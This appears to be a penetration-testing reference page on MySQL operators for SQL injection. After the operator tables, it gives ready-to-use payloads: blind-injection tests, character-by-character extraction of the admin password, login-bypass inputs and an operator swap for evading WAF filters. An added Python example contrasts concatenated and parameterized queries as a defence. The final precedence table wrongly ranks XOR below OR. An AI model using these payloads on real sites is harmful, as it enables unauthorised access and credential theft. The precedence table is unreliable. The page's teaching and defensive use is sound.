Operators

MySQL operators useful for SQL injection techniques

Understanding MySQL operators is essential for crafting effective SQL injection payloads. This reference covers the most useful operators for SQL injection techniques.

Comparison Operators

Operator      Description             Example
=             Equal                   SELECT * FROM users WHERE id = 1
<=>           NULL-safe equal         SELECT * FROM users WHERE name <=> NULL
<> or !=      Not equal               SELECT * FROM users WHERE id <> 1
>             Greater than            SELECT * FROM users WHERE id > 1
>=            Greater than or equal   SELECT * FROM users WHERE id >= 1
<             Less than               SELECT * FROM users WHERE id < 10
<=            Less than or equal      SELECT * FROM users WHERE id <= 10
BETWEEN       Between range           SELECT * FROM users WHERE id BETWEEN 1 AND 10
IS NULL       Null check              SELECT * FROM users WHERE email IS NULL
IS NOT NULL   Not null check          SELECT * FROM users WHERE email IS NOT NULL
LIKE          Pattern matching        SELECT * FROM users WHERE name LIKE 'a%'
REGEXP        Regular expression      SELECT * FROM users WHERE name REGEXP '^a'
IN            In set                  SELECT * FROM users WHERE id IN (1,2,3)

Logical Operators

Operator      Description    Example
AND or &&     Logical AND    SELECT * FROM users WHERE active=1 AND admin=1
OR or ||      Logical OR     SELECT * FROM users WHERE id=1 OR username='admin'
NOT or !      Logical NOT    SELECT * FROM users WHERE NOT id=1
XOR           Logical XOR    SELECT * FROM users WHERE id=1 XOR admin=1

Mathematical Operators

Operator      Description        Example
+             Addition           SELECT id+1 FROM users
-             Subtraction        SELECT id-1 FROM users
*             Multiplication     SELECT id*2 FROM users
/             Division           SELECT id/2 FROM users
DIV           Integer division   SELECT id DIV 2 FROM users
% or MOD      Modulo             SELECT id % 2 FROM users

Bitwise Operators

Operator      Description    Example
&             Bitwise AND    SELECT 5 & 1 (returns 1)
|             Bitwise OR     SELECT 5 | 1 (returns 5)
^             Bitwise XOR    SELECT 5 ^ 1 (returns 4)
<<            Left shift     SELECT 1 << 2 (returns 4)
>>            Right shift    SELECT 4 >> 2 (returns 1)
~             Bitwise NOT    SELECT ~1 (returns -2)

Assignment Operators

Operator      Description        Example
:=            Value assignment   SET @var := 1

String Operators

Operator      Description                    Example
CONCAT()      String concatenation           SELECT CONCAT(first_name, ' ', last_name) FROM users
CONCAT_WS()   Concatenation with separator   SELECT CONCAT_WS('-', 'a', 'b', 'c') (returns 'a-b-c')

Usage in SQL Injection

Boolean-Based Blind Injection

-- Testing if admin exists
' OR EXISTS(SELECT * FROM users WHERE username='admin') -- -

-- Character by character extraction
' OR ASCII(SUBSTRING((SELECT password FROM users WHERE username='admin'),1,1))=97 -- -

Operator Precedence Exploitation

Operators follow a precedence order that can be exploited:

-- AND has higher precedence than OR
1=0 OR 1=1 AND 2=2 -- True because (1=1 AND 2=2) evaluates first

-- Using parentheses to control evaluation order
1=0 OR (1=1 AND 2=2) -- True
(1=0 OR 1=1) AND 2=2 -- True

Alternative Operator Forms

Using alternative forms can help bypass WAF filters:

-- Standard form
SELECT * FROM users WHERE id=1 OR username='admin'

-- Alternative form
SELECT * FROM users WHERE id=1 || username='admin'

Practical Examples in Injections

-- Using NOT to invert conditions
' OR NOT 2=3 -- -

-- Using IN for multiple values
' OR username IN ('admin','root') -- -

-- Using LIKE for pattern matching
' OR username LIKE 'adm%' -- -

-- Using BETWEEN for range checking
' OR id BETWEEN 1 AND 5 -- -
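
The inputs listed above, replayed against a string-built query and a parameterized one, as an added example that is not part of the original page. It uses Python's sqlite3 as an offline stand-in for MySQL (the operators involved parse the same way there); the users table, its rows and the function names are assumptions made up for the example.

```python
import sqlite3

# Constructed sample data; table, columns and rows are assumptions for this example.
def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    db.executemany("INSERT INTO users (username, password) VALUES (?, ?)",
                   [("admin", "s3cret"), ("alice", "hunter2")])
    return db

# Inputs copied from the "Practical Examples in Injections" list on this page.
PAGE_INPUTS = [
    "' OR NOT 2=3 -- -",
    "' OR username IN ('admin','root') -- -",
    "' OR username LIKE 'adm%' -- -",
    "' OR id BETWEEN 1 AND 5 -- -",
]

def lookup_concat(db, username, password):
    # Vulnerable: the input becomes SQL text. Its quote closes the literal, its
    # OR clause is parsed as part of WHERE, and "-- -" comments out the password check.
    sql = ("SELECT username FROM users WHERE username = '" + username +
           "' AND password = '" + password + "'")
    return [row[0] for row in db.execute(sql)]

def lookup_bound(db, username, password):
    # Hardened: placeholders keep the input as data, so operators inside it
    # are compared as plain characters and never reach the SQL parser.
    sql = "SELECT username FROM users WHERE username = ? AND password = ?"
    return [row[0] for row in db.execute(sql, (username, password))]

def audit(lookup):
    # Return the page inputs for which a wrong password still matched a row.
    db = make_db()
    return [p for p in PAGE_INPUTS if lookup(db, p, "wrong")]

if __name__ == "__main__":
    print("concatenated query matched for:", audit(lookup_concat))
    print("bound query matched for:", audit(lookup_bound))
```

The concatenated lookup matches rows for all four inputs; the bound lookup matches none of them and still returns the row for a correct username and password.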

Truth Table for Logical Operators

Expr1   Expr2   AND     OR      XOR
TRUE    TRUE    TRUE    TRUE    FALSE
TRUE    FALSE   FALSE   TRUE    TRUE
FALSE   TRUE    FALSE   TRUE    TRUE
FALSE   FALSE   FALSE   FALSE   FALSE
NULL    TRUE    NULL    TRUE    NULL
TRUE    NULL    NULL    TRUE    NULL
FALSE   NULL    FALSE   NULL    NULL
NULL    FALSE   FALSE   NULL    NULL
NULL    NULL    NULL    NULL    NULL

Operator Precedence in MySQL

From highest to lowest:

  1. !, ~ (unary operators)
  2. ^ (bitwise XOR)
  3. *, /, DIV, %, MOD
  4. -, + (binary operators)
  5. <<, >>
  6. &
  7. |
  8. =, <=>, >=, >, <=, <, <>, !=, IS, LIKE, REGEXP
  9. BETWEEN, CASE, WHEN, THEN, ELSE
  10. NOT
  11. AND, &&
  12. OR, ||
  13. XOR

Understanding operator precedence is crucial for complex injections.
